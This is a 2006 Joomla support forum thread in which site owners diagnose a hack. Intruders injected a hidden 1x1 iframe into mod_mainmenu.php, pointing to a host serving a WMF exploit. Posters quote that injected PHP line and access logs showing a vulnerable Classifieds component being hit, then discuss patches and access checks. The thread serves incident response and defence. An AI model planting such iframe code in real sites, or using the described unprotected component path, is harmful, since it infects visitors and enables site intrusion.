Site Hacked
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
- shiftsrl
- Joomla! Explorer
- Posts: 269
- Joined: Fri Aug 26, 2005 11:05 am
- Location: Como - Italy
- Contact:
Site Hacked
Now it's ok but my site was hacked by someone. I've noticed that the file mod_mainmenu.php was hacked and inside someone added an iframe that goes to http://zchxsikpgz.biz/dl/xpladv521.wmf that is a Exploit.WMF.A.
My Joomla version is 1.0.10. How was that possible?
As soon as I can I'll post the mod_mainmenu.php modified. I've overwritten the hacked on with a fresh one and now everything is ok.
My Joomla version is 1.0.10. How was that possible?
As soon as I can I'll post the mod_mainmenu.php modified. I've overwritten the hacked on with a fresh one and now everything is ok.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site Hacked
Please list here the 3pds extensions you are using, as well as their version number.
Please also look here for known 3pds vulnerabilities and their upgrade if available.
http://forum.joomla.org/index.php/topic,79477.0.html
Changing the mod_mainmenu.php file will not help you as you have to figure first how your site was hacked in order to prevent it in the future.
Please also look here for known 3pds vulnerabilities and their upgrade if available.
http://forum.joomla.org/index.php/topic,79477.0.html
Changing the mod_mainmenu.php file will not help you as you have to figure first how your site was hacked in order to prevent it in the future.
Last edited by infograf768 on Thu Aug 03, 2006 9:42 am, edited 1 time in total.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- shiftsrl
- Joomla! Explorer
- Posts: 269
- Joined: Fri Aug 26, 2005 11:05 am
- Location: Como - Italy
- Contact:
Re: Site Hacked
You're right but at least I've restored the site functionality. Here's the list of components. I've seen that I've performs and maybe they've used this one to hack the site. I've deleted it.
You do not have the required permissions to view the files attached to this post.
- shiftsrl
- Joomla! Explorer
- Posts: 269
- Joined: Fri Aug 26, 2005 11:05 am
- Location: Como - Italy
- Contact:
Re: Site Hacked
Here are the lines added to my mod_mainmenu.php
Code: Select all
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>';
echo '<iframe src="http://zchxsikpgz.biz/dl/adv521.php" width=1 height=1></iframe>'; if (!defined( '_MOS_MAINMENU_MODULE' )) {
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site Hacked
Be sure to delete all related files by ftp and check the modification dates for other files.
OT: I see sef_advance is displayed twice, and that, instead of JCE, you are using the older mce.
Also, docman is a versin RC1 and not RC2.
OT: I see sef_advance is displayed twice, and that, instead of JCE, you are using the older mce.
Also, docman is a versin RC1 and not RC2.
Last edited by infograf768 on Thu Aug 03, 2006 10:07 am, edited 1 time in total.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- Aspegic
- Joomla! Apprentice
- Posts: 19
- Joined: Wed Sep 07, 2005 5:49 pm
Re: Site Hacked
@shiftsrl:
I do not know if you've resolved the issue yet or not, but today I was contacted by the administrator of a joomla site running on our server. He reported the exact same hack as you described (modified mod_mainmenu.php to include iframe to some site).
I searched the logfiles for his site and found the following lines:
This looked suspicious to me. A direct link to images.php? From an IP address in the Ukraine? I assume there aren't too many Ukranians who speak dutch (it's a dutch website).
I found that the direct URL does indeed allow direct execution of images.php, bypassing normal joomla security. That file, as well as a few other php files in that folder are missing some of the standard joomla security checks (like "defined( '_VALID_MOS' ) or die( 'Restricted access' );" for example). I'm not a joomla expert but I assume this is the cause of the vulnerability.
I still need the do several more checks to see if this is indeed the cause of the problem, but at the moment it sure looks like it. Since you posted that you're also running com_classifieds the same vulnerability may also be the cause of your problem.
HTH
Cheers,
Aspegic
I do not know if you've resolved the issue yet or not, but today I was contacted by the administrator of a joomla site running on our server. He reported the exact same hack as you described (modified mod_mainmenu.php to include iframe to some site).
I searched the logfiles for his site and found the following lines:
Code: Select all
82.207.99.8 - - [04/Aug/2006:11:06:51 +0200] "GET //administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14196 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:06:52 +0200] "GET //administrator/components/com_classifieds/popups/insert_image.php HTTP/1.0" 200 18502 "-" "Mozilla/4.0"
82.207.99.8 - - [04/Aug/2006:11:21:50 +0200] "POST /administrator/components/com_classifieds/popups/ImageManager/images.php HTTP/1.0" 200 14198 "-" "Mozilla/4.0 (compatible; Synapse)"
82.207.99.8 - - [04/Aug/2006:11:21:52 +0200] "GET /components/com_classifieds/adimages/config.php HTTP/1.0" 200 5 "-" "Mozilla/4.0"
I found that the direct URL does indeed allow direct execution of images.php, bypassing normal joomla security. That file, as well as a few other php files in that folder are missing some of the standard joomla security checks (like "defined( '_VALID_MOS' ) or die( 'Restricted access' );" for example). I'm not a joomla expert but I assume this is the cause of the vulnerability.
I still need the do several more checks to see if this is indeed the cause of the problem, but at the moment it sure looks like it. Since you posted that you're also running com_classifieds the same vulnerability may also be the cause of your problem.
HTH
Cheers,
Aspegic
Last edited by Aspegic on Sat Aug 05, 2006 11:07 am, edited 1 time in total.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site Hacked
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- Aspegic
- Joomla! Apprentice
- Posts: 19
- Joined: Wed Sep 07, 2005 5:49 pm
Re: Site Hacked
I do believe that thread discussus a different classifieds component called "Noah". The one installed on the website on our server used the classifieds component available at mambo.posluh.hrinfograf768 wrote: February discovered vulnerability.
See here:
http://forum.joomla.org/index.php/topic,40492.0.html
The snapshot posted earlier by shiftsrl - showing the 3rd party components he has installed on his site - shows he uses the same version as was installed on my clients site: "Classifieds v1.3 M451".
I visited mambo.posluh.hr and it appears Classifieds version 1.3 M451 is currently the latest release available from that website (released january 2005). The download from their website still contains the php scripts without the necessary security checks.
Cheers,
Aspegic
Last edited by Aspegic on Sat Aug 05, 2006 2:49 pm, edited 1 time in total.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site Hacked
Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/
The security patch is clearly shown.
Hope it helps
http://support.gorsk.net/content/view/87/2/
The security patch is clearly shown.
Hope it helps
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- Aspegic
- Joomla! Apprentice
- Posts: 19
- Joined: Wed Sep 07, 2005 5:49 pm
Re: Site Hacked
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...infograf768 wrote: Then yours has been updated by the developper here:
http://support.gorsk.net/content/view/87/2/
Thanks for the link. I'll pass it along to my client.
Cheers,
Aspegic
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site Hacked
That old mambo site has not beem updated since april 2005.Aspegic wrote:
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
It is dead I guess.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Intern
- Posts: 64
- Joined: Mon Aug 22, 2005 6:47 pm
Re: Site Hacked
Maybe RobS takes this component to his list too
-
- Joomla! Apprentice
- Posts: 18
- Joined: Wed Aug 09, 2006 10:16 pm
Re: Site Hacked
Hi, I have have just been made aware of this hack to one of my sites. I use the Classifieds component so downloaded the patch from the link above. However if you look at the two files in the patch the fix is negated by the line:infograf768 wrote:That old mambo site has not beem updated since april 2005.Aspegic wrote:
Although my russian is a bit rusty, there is enough english there to suggest that is indeed the same component. Just a bit strange that the security update is not available from posluh.hr...
It is dead I guess.
define( "_VALID_MOS", 1 );
Very strange. You need to comment this out, I believe
-
- Joomla! Enthusiast
- Posts: 182
- Joined: Thu Aug 18, 2005 8:43 pm
- Contact:
Re: Site Hacked
not only comment that out... but add the following lines at the start of the file, just after the source commentary:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');
-
- Joomla! Apprentice
- Posts: 18
- Joined: Wed Aug 09, 2006 10:16 pm
Re: Site Hacked
I think, this line:
require( "../../../../includes/auth.php" ); // Thx 2 Lismo
adds the important
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
However I see there are other files that don't have any protection. I am going to remove this component.
require( "../../../../includes/auth.php" ); // Thx 2 Lismo
adds the important
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
However I see there are other files that don't have any protection. I am going to remove this component.
- shiftsrl
- Joomla! Explorer
- Posts: 269
- Joined: Fri Aug 26, 2005 11:05 am
- Location: Como - Italy
- Contact:
Re: Site Hacked
Thanks for the info. In my case I think that the problem was the component PerForms wich I've deleted. In any case I've patched also the classified but a question still remains. Is this component secure with the patch or not?
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Sep 14, 2005 12:15 pm
Re: Site Hacked
Hi,
I have same problem with this component. Have also been hacked by Inserting Iframe.
I use this component a lot. Does anyone have any sugestion on this?
Is anybody out there whou could check security of this component adn posibly fix the security issues?
I have same problem with this component. Have also been hacked by Inserting Iframe.
I use this component a lot. Does anyone have any sugestion on this?
Is anybody out there whou could check security of this component adn posibly fix the security issues?
Re: Site Hacked
Has anyone every developed com_classified further? Any security issues still on this?